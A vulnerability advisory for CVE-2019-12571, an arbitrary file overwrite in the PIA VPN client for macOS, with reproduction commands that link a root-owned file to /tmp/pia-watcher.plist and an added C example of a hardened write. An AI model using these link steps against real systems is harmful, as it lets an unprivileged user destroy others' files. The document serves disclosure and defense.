Allele Security Alert
ASA-2019-00378
Identifier(s)
ASA-2019-00378, CVE-2019-12571
Title
Arbitrary File Overwrite
Vendor(s)
London Trust Media
Product(s)
Private Internet Access (PIA) VPN Client for macOS
Affected version(s)
Private Internet Access (PIA) VPN Client for macOS version v0.9.8 beta (build 02099)
Fixed version(s)
Private Internet Access (PIA) VPN Client for macOS version v1.2.1
Proof of concept
Unknown
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to overwrite arbitrary files.
Technical details
When the client initiates a connection, it creates the XML file /tmp/pia-watcher.plist. If the file already exists, it is truncated and its contents are completely overwritten. The file is removed on disconnect. An unprivileged user can create a hard or soft link at that path to arbitrary files owned by any user on the system, including root, and the client's write then lands on the linked file. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
Steps to reproduce
All steps are executed as a low privileged user.
macbook:~ test2$ id
uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2)
Step 1 – Create a root owned test file with permissions 600.
bash-3.2# echo "this is a test" > /etc/test.file
bash-3.2# chmod 600 /etc/test.file
bash-3.2# ls -ld /etc/test.file
-rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file
Step 2 – Show that test2 does not have permission to write to /etc/test.file.
macbook:~ test2$ echo test > /etc/test.file
-bash: /etc/test.file: Permission denied
Step 3 – Create a hard or soft link to a root owned file.
macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist
Step 4 – Open the PIA client and connect. The file will be overwritten with the XML plist.
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
ls: /tmp/pia-watcher.plist: No such file or directory
12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file
Step 5 – As root display the contents of /etc/secret.file
bash-3.2# cat /etc/test.file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.privateinternetaccess.vpn.watcher</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string>
    </array>
    <key>EnvironmentVariables</key>
    <dict>
        <key>script_type</key>
        <string>watch-notify</string>
    </dict>
    <key>StandardErrorPath</key>
    <string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string>
    <key>WatchPaths</key>
    <array>
        <string>/Library/Preferences/SystemConfiguration</string>
    </array>
</dict>
</plist>
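The following is an added example, not code from the advisory or from the PIA client. It puts the truncating write described under Technical details beside one hardened way to write the same file. The function names are hypothetical, and the link scenario is constructed inside a private mkdtemp() directory rather than /etc.

```c
#define _XOPEN_SOURCE 700 /* POSIX.1-2008: O_NOFOLLOW, mkdtemp, symlink */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: truncate whatever the path resolves to. */
int write_truncating(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    int ok = write(fd, data, strlen(data)) == (ssize_t)strlen(data);
    close(fd);
    return ok ? 0 : -1;
}
/* Hardened variant (assumed fix): drop the existing name, which leaves a linked
 * target intact, then write only to a file this call created itself. */
int write_exclusive(const char *path, const char *data) {
    if (unlink(path) != 0 && errno != ENOENT) return -1;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1; /* name reappeared in between: fail closed */
    struct stat st;        /* new inode must be a regular file with one name */
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_nlink == 1
             && write(fd, data, strlen(data)) == (ssize_t)strlen(data);
    close(fd);
    return ok ? 0 : -1;
}
/* Constructed scenario: "victim" is linked to "pia-watcher.plist" in a private
 * temp dir, then writer() runs. Returns 1 if victim kept its content, else 0. */
int victim_survives(int (*writer)(const char *, const char *), int use_symlink) {
    char dir[] = "/tmp/linkdemo.XXXXXX", victim[64], plist[64], buf[32] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(plist, sizeof plist, "%s/pia-watcher.plist", dir);
    if (write_truncating(victim, "this is a test\n") != 0) return -1;
    if ((use_symlink ? symlink(victim, plist) : link(victim, plist)) != 0) return -1;
    writer(plist, "<plist version=\"1.0\"/>\n");
    int fd = open(victim, O_RDONLY);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
    if (fd >= 0) close(fd);
    unlink(plist); unlink(victim); rmdir(dir);
    return n >= 0 && strcmp(buf, "this is a test\n") == 0;
}
int main(void) {
    printf("truncating: hard=%d sym=%d\n", victim_survives(write_truncating, 0), victim_survives(write_truncating, 1));
    printf("exclusive:  hard=%d sym=%d\n", victim_survives(write_exclusive, 0), victim_survives(write_exclusive, 1));
    return 0;
}
```

Creating the file in a directory that only the privileged process can write to removes the opportunity to pre-place a link at all. The exclusive open is the fallback when a shared location such as /tmp cannot be avoided.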
Credits
Rich Mirch
Reference(s)
PIA Beta macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12571.txt
CVE-2019-12571
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12571
CVE-2019-12571
https://nvd.nist.gov/vuln/detail/CVE-2019-12571
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: August 5, 2019